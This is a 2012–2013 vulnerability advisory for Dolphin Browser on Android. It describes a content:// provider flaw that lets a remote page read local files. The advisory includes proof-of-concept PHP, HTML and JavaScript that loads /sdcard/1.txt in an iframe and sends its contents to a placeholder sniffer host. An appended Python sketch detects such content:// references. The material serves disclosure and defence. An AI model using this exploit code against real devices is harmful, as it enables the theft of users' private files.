Vulnerable software
Dolphin Browser
Version: 9.0.3 and earlier
Application link: http://dolphin-browser.com/
Severity level: Medium
Impact: Arbitrary File Reading
Access Vector: Remote
CVSS v2:
Base Score: 5.8
Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:P)
CVE: not assigned
Software description
Dolphin Browser is a powerful, quick and elegant browser for Android 2.0+.
Vulnerability description
The specialists of the Positive Research center have detected a Remote Arbitrary File Reading vulnerability in Dolphin Browser.
The vulnerability is caused by incorrect processing of the content:// wrapper, which allows the available content provider to be addressed remotely. An attacker can therefore view the contents of the /sdcard/1.txt file if the victim follows the link content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt.
The attack is simple to implement.
A victim follows a link to the web site with the following PHP code:
echo "<body onload=\"setTimeout('window.location=\'1day.php\'',1000);setTimeout('window.location=\'content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html\'',5000);\">";
The browser automatically loads the 1day.php page with the following code:
header('Content-Disposition: attachment; filename="test.html"');
<iframe src="content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt"></iframe>
<script>
window.onload = function () { file = document.getElementsByTagName('iframe')[0].contentWindow.document.body.innerHTML;
img = new Image(); img.src = 'http://oursniffer/sniff.php?data='+file;
}
</script>
The user then presses the “Save” button, and the exploit is now located at /sdcard/download/test.html
Then we forward the user to this file (content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html) via a link and the code is executed.
Data from /sdcard/1.txt file is written into the sniffer’s log.
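A detection sketch for the pattern described above, added here as an example and not part of the original advisory: it scans HTML delivered over http(s), for instance at an inspecting proxy, for content:// references in URL attributes, event handlers and inline scripts. The sample pages are constructed from the two pages shown above, and the site.example URL is an assumption.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# content://<authority>/<path>; the path stops at quotes, backslashes and whitespace.
CONTENT_URI = re.compile(r"""content://([A-Za-z0-9._-]+)(/[^\s'"\\<>)]*)?""")
URL_ATTRS = {"src", "href", "action", "data"}

class ContentUriScanner(HTMLParser):
    """Collects content:// references from URL attributes, on* handlers and scripts."""

    def __init__(self):
        super().__init__()
        self.findings = []        # (location, provider authority, path)
        self._in_script = False

    def _scan(self, where, text):
        for m in CONTENT_URI.finditer(text or ""):
            self.findings.append((where, m.group(1), m.group(2) or ""))

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if name in URL_ATTRS or name.startswith("on"):
                self._scan(f"<{tag} {name}>", value)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._scan("<script>", data)

def scan_page(page_url, html):
    """Return content:// references found in a page fetched over http(s)."""
    if urlsplit(page_url).scheme not in ("http", "https"):
        return []  # only remote pages addressing a local provider are of interest
    scanner = ContentUriScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed samples, modelled on the two pages shown in the advisory.
REDIRECT_PAGE = r"""<body onload="setTimeout('window.location=\'1day.php\'',1000);setTimeout('window.location=\'content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html\'',5000);">"""
IFRAME_PAGE = '<iframe src="content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt"></iframe>'
BENIGN_PAGE = '<a href="https://example.com/">link</a><script>var note = "no local URIs";</script>'

if __name__ == "__main__":
    for page in (REDIRECT_PAGE, IFRAME_PAGE, BENIGN_PAGE):
        print(scan_page("http://site.example/", page))
```

Each finding names the element or handler, the provider authority and the requested path, so hits can be filtered to a specific authority such as mobi.mgeek.TunnyBrowser.htmlfileprovider.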
How to fix
Update your software to the latest version.
Advisory status
18.12.2012 - Vendor is notified
18.12.2012 - Vendor gets vulnerability details
05.02.2013 - Vendor releases fixed version and details
07.03.2013 - Public disclosure
Credits
The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)
References
https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2012-60/